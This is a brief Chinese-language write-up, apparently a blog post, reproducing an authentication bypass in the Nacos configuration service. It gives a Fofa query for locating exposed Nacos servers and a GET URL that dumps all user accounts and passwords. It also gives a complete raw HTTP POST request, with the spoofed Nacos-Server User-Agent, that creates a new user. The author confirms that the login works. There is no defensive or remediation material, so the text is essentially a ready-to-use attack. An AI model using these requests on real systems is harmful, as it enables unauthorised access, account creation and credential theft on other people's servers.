前言
Nacos动态域名和配置服务,英文缩写是Dynamic Naming and Configuration Service, 取的Naming的前两个字母,Configuration的前2个字母,以及Service的首字母组成的。
Fofa
title="Nacos"
漏洞复现
POC1:查看用户的账号和密码
/nacos/v1/auth/users?pageNo=1&pageSize=100
直接访问漏洞url,如果存在漏洞,则可以直接显示当前数据库中所有用户信息
POC2:添加用户
POST /nacos/v1/auth/users HTTP/1.1
Host: 127.0.0.1
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/
*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
username=aaaa&password=bbbb
虽然服务器返回了406,但是用户还是添加成功了
登录成功
使用POC1查看多出aaaa用户信息
